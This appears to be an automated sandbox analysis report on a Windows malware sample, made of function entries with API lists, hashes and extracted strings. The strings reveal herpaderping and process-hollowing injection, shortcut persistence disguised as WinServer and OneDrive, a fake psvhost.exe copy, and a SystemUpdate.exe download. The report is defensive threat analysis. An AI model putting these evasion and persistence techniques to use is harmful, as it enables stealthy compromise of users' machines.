                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$ContextWow64$AddressCreateHandleInternalModuleProcProcessResumeSectionViewwcsnlen
                                                                                                                                                                                                                                  • String ID: CreateProcessInternalW$kernel32
                                                                                                                                                                                                                                  • API String ID: 1125945598-4069603262
                                                                                                                                                                                                                                  • Opcode ID: 8100aae60a3a38117a167ad8c34844d310698dd5fc654ce53c76c7e31ad9ee12
                                                                                                                                                                                                                                  • Instruction ID: cfdb32bc4af574d6681258e8d6f18e50224b5dfb2f1c739a8ed32fb07aff76fa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8100aae60a3a38117a167ad8c34844d310698dd5fc654ce53c76c7e31ad9ee12
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B51B232A0AB41E6EB50CF24E4406AA7BA4FF88794F544239DE9D83794DF3CD155CB00

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$InformationProcess_errno$AdjustAllocateChangeCloseCurrentFindHeapNotificationOpenPrivileges_callnewhfreemalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1402168008-0
                                                                                                                                                                                                                                  • Opcode ID: 7ce135d074d5de56d802d4dee4aad95d01fe18e0a52ed59db4a7ac59e77ae686
                                                                                                                                                                                                                                  • Instruction ID: bac463430276feef8e06bb198dc508b3d7cf8343fc4c0b3c8fa84c639cc70f62
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ce135d074d5de56d802d4dee4aad95d01fe18e0a52ed59db4a7ac59e77ae686
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A216D36A2AA42D2EB508B11E41476A7B61FF85B85F401179EEDF97B58DF3CE044CB00

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 358 7ff68a187c00-7ff68a187c54 359 7ff68a187c56-7ff68a187c65 358->359 360 7ff68a187cd4 358->360 361 7ff68a187c6a 359->361 362 7ff68a187c67 359->362 363 7ff68a187cd7-7ff68a187d32 call 7ff68a188df8 call 7ff68a189eb0 SHGetFolderPathW 360->363 364 7ff68a187c6e-7ff68a187c72 361->364 362->361 380 7ff68a187d3c-7ff68a187d45 363->380 381 7ff68a187d34-7ff68a187d37 363->381 366 7ff68a187c74-7ff68a187c7b 364->366 367 7ff68a187ca3-7ff68a187ca8 364->367 371 7ff68a187c7e-7ff68a187c84 366->371 369 7ff68a187caa-7ff68a187cad 367->369 370 7ff68a187caf 367->370 373 7ff68a187cb2-7ff68a187cb5 369->373 370->373 374 7ff68a187c98-7ff68a187c9d 371->374 375 7ff68a187c86-7ff68a187c91 371->375 373->360 377 7ff68a187cb7-7ff68a187cbb 373->377 379 7ff68a187c9f-7ff68a187ca1 374->379 375->371 378 7ff68a187c93-7ff68a187c96 375->378 377->364 378->379 379->367 382 7ff68a187cbd-7ff68a187cc2 379->382 384 7ff68a187d4a-7ff68a187d52 380->384 383 7ff68a187ec1-7ff68a187ec6 381->383 386 7ff68a187cc9 382->386 387 7ff68a187cc4-7ff68a187cc7 382->387 388 7ff68a187ec8-7ff68a187ecc call 7ff68a18c484 383->388 389 7ff68a187ed1-7ff68a187ee3 383->389 384->384 385 7ff68a187d54-7ff68a187d58 384->385 390 7ff68a187d5a-7ff68a187d71 385->390 391 7ff68a187d73-7ff68a187d81 call 7ff68a18a6f8 385->391 392 7ff68a187ccc-7ff68a187cd2 386->392 387->392 388->389 394 7ff68a187ee5-7ff68a187ee9 call 7ff68a18c484 389->394 395 7ff68a187eee-7ff68a187f19 call 7ff68a18bb20 389->395 396 7ff68a187d86-7ff68a187dc6 call 7ff68a18a920 call 7ff68a18af64 call 7ff68a18afb8 390->396 391->396 392->363 394->395 407 7ff68a187dc8-7ff68a187dcd call 7ff68a18c484 396->407 408 7ff68a187dd2-7ff68a187de5 396->408 407->408 409 7ff68a187de7-7ff68a187deb call 7ff68a18c484 408->409 410 7ff68a187df0-7ff68a187e29 CoInitialize CoCreateInstance 408->410 409->410 413 7ff68a187e9d-7ff68a187ea9 CoUninitialize 410->413 414 7ff68a187e2b-7ff68a187e30 410->414 415 7ff68a187eab-7ff68a187eaf call 7ff68a18c484 413->415 416 7ff68a187eb4-7ff68a187ebc 413->416 417 7ff68a187e35-7ff68a187e6c 414->417 418 7ff68a187e32 414->418 415->416 416->383 423 7ff68a187e93-7ff68a187e97 417->423 424 7ff68a187e6e-7ff68a187e83 417->424 418->417 423->413 425 7ff68a187e89-7ff68a187e8d 424->425 425->423
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFolderInitializeInstancePathUninitialize
                                                                                                                                                                                                                                  • String ID: .lnk$WinServer
                                                                                                                                                                                                                                  • API String ID: 760132150-1496378126
                                                                                                                                                                                                                                  • Opcode ID: 67a85fbf69f2377e88e1748d9c978f625df547cbd3f940e233c79c74179f9b8d
                                                                                                                                                                                                                                  • Instruction ID: d52c51cd6a0ef960075bc8bb1034c4cf4571fb2f6d22478d53efd3c1aafe0f25
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67a85fbf69f2377e88e1748d9c978f625df547cbd3f940e233c79c74179f9b8d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8A17A22B5AB42E6EB10CF65D8541AC3771FF44B88B401179CE9DA3BA8DF38E559C380
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateSection
                                                                                                                                                                                                                                  • String ID: herpaderping
                                                                                                                                                                                                                                  • API String ID: 3832541453-3390404583
                                                                                                                                                                                                                                  • Opcode ID: dc1176962a1a86c629cb42389b2f8d6b38a9cc3a70b5af4755ec92ecf4cc9c5e
                                                                                                                                                                                                                                  • Instruction ID: fa913ea6766ab6620b3d0dcfabf86ced54e50672333e88e153c7124b359f2cc4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc1176962a1a86c629cb42389b2f8d6b38a9cc3a70b5af4755ec92ecf4cc9c5e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4101A12271960292EA109B20E85533A7A61FF89BB4F541378EEBE86AD4EF2DD044C600

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseHandle$View$AllocCreateMappingSizeUnmapVirtual
                                                                                                                                                                                                                                  • String ID: Could not allocate memory in the current process$[X] Could not create mapping!$[X] Could not map view of file
                                                                                                                                                                                                                                  • API String ID: 1995941692-1760046244
                                                                                                                                                                                                                                  • Opcode ID: cce1190e9b3ddd7eccb770f27c10141449ca55bda23d474c8bf9b4b46df8ebd5
                                                                                                                                                                                                                                  • Instruction ID: 5239af96161514e7cec1451a5049433927c295f997a488ff4e8e87389a95fd98
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cce1190e9b3ddd7eccb770f27c10141449ca55bda23d474c8bf9b4b46df8ebd5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD317C21B5A752E1EA04EB12A8543BD6B92BF89FC0F4444B9DD9E97752EE3CF409C300

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileName$CloseCreateErrorExitFindHandleLastModuleMutexPathProcess
                                                                                                                                                                                                                                  • String ID: Unknown$ZBI$relog.exe
                                                                                                                                                                                                                                  • API String ID: 1305963544-2654455354
                                                                                                                                                                                                                                  • Opcode ID: ccb2bcbe5b10f97b93865fe47ac910cf2cde3109da3f9fa5b2e534f4e6bd3a9d
                                                                                                                                                                                                                                  • Instruction ID: a13fc73913e0326b42ca7736080c4d3896661383c5c36d20b074b962ff698290
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ccb2bcbe5b10f97b93865fe47ac910cf2cde3109da3f9fa5b2e534f4e6bd3a9d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB212D60A4EA43F1FA14AB20A8552B96B65BF44794F4805BDDDEED25E6EF3CF508C300

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ContextThread$Wow64$MemoryProcessWrite
                                                                                                                                                                                                                                  • String ID: Cannot update ImageBaseAddress!$Cannot update remote EP!$Failed getting remote PEB address!
                                                                                                                                                                                                                                  • API String ID: 4067073250-2699618380
                                                                                                                                                                                                                                  • Opcode ID: 150d2d0ff0f6e237eb6ee39db40761c803c5be153981ca0bfed076ff8f0e1f21
                                                                                                                                                                                                                                  • Instruction ID: 1a8f98b8fcd9a789d37e64a0d08f4ebb4febafe078999c880604db38b94ef721
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 150d2d0ff0f6e237eb6ee39db40761c803c5be153981ca0bfed076ff8f0e1f21
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7741D763A59682E5EB208F20E8403F86B61BF41798F945279DEAD862C9DF7CE549C700

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFolderInitializeInstancePathUninitializewsprintf
                                                                                                                                                                                                                                  • String ID: %s\%s.lnk$OneDrive
                                                                                                                                                                                                                                  • API String ID: 2242482654-657796374
                                                                                                                                                                                                                                  • Opcode ID: 4c3bd45f77b36faec18a1d245dbf92288d63d4509f73fc936c5b6cf24f4abd7f
                                                                                                                                                                                                                                  • Instruction ID: 7ab7326f9ef063043da0d84bc51806a6dd2458bc3cb79ef57c3ddf7afc9473e3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c3bd45f77b36faec18a1d245dbf92288d63d4509f73fc936c5b6cf24f4abd7f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E316B72719B46D2DB108F25E4446A97B61FF88B88F40507ADE9E87B28DF3DE148C700

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: :\$QuBi${%08lX%04lX%lu}
                                                                                                                                                                                                                                  • API String ID: 3001812590-3210385017
                                                                                                                                                                                                                                  • Opcode ID: 77954543e0ae8c8047d10d44f93f2a9c72b29644aabf7d365a516739bb0ea79a
                                                                                                                                                                                                                                  • Instruction ID: 5d814640a816061e32040c0e67ef8c50fb5dceeec2b2b8cb5fa556a437d6fdf1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77954543e0ae8c8047d10d44f93f2a9c72b29644aabf7d365a516739bb0ea79a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5431457260C785DAC314CF79A89115AFFA5FB99340F54517AEAC9C3A28EB3CD208CB00

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Pointer$SizeWrite_errno_invalid_parameter_noinfowprintf
                                                                                                                                                                                                                                  • String ID: [+] Overwriting file content
                                                                                                                                                                                                                                  • API String ID: 220120263-1087971816
                                                                                                                                                                                                                                  • Opcode ID: c26efce9ec2188fac821274fe5364cb1f70c3828d197fe3d63859887cec324bd
                                                                                                                                                                                                                                  • Instruction ID: 8161c59ddacb6f78557aceb90fdcf32474fcccab583af5bc6286351dc0d7a3a2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c26efce9ec2188fac821274fe5364cb1f70c3828d197fe3d63859887cec324bd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77018221B29945D1E600CB15F99577ABB62FF84B84F405175EE9E86A24CF2CE409CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CopyCreateDirectoryFilewcsncpy
                                                                                                                                                                                                                                  • String ID: \Microsoft$\psvhost.exe
                                                                                                                                                                                                                                  • API String ID: 329375489-403768370
                                                                                                                                                                                                                                  • Opcode ID: b936105249ac7b1fcc73de3b8a3057b14c7ac63a973ae248083b24eb71c07c2c
                                                                                                                                                                                                                                  • Instruction ID: d735f3d1d84ef9c34ec31ab8975387f82ca0abc20847c61169c969ef32167d6d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b936105249ac7b1fcc73de3b8a3057b14c7ac63a973ae248083b24eb71c07c2c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09318D6661AA81E1DB618F15E8502BA77A1FF48BC4F50417ACE8C83768DF3CD95AC740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Path$FolderInternetOpenTemp
                                                                                                                                                                                                                                  • String ID: Mozilla 5/0$SystemUpdate.exe
                                                                                                                                                                                                                                  • API String ID: 3028979721-1667272149
                                                                                                                                                                                                                                  • Opcode ID: aa8486e344bf38601dbf74f5ef09ddfd5e1d0c110bc31d4634bda436f9f0463d
                                                                                                                                                                                                                                  • Instruction ID: 5d507d39e3b5c2af08d6520c39d67b53dddc409be288c8c0677d83166c54cd2a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa8486e344bf38601dbf74f5ef09ddfd5e1d0c110bc31d4634bda436f9f0463d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C115172B1A642E2FA609B10E4547BA6791FF99748F805079DECE86A85EF3CE108C704
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3132538880-0
                                                                                                                                                                                                                                  • Opcode ID: 76445e9cbc6cd9ab1f6cbcf7a2f2c6e46b211274f6edb25bae53a7d05003b39e
                                                                                                                                                                                                                                  • Instruction ID: 2fe1e73f133900c8d117a5657fa8151986ed586054de61508bb5d4032aa64d7a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76445e9cbc6cd9ab1f6cbcf7a2f2c6e46b211274f6edb25bae53a7d05003b39e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79F0A72AB1552096E7619F28AA4467A6770BF587F1F041735DEBE837E0DF2C9486C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::ios_base::_$CloseHandleIos_base_dtorProcessProcess32$CreateExceptionFirstNextOpenSnapshotTerminateThrowTidyToolhelp32std::exception::exception
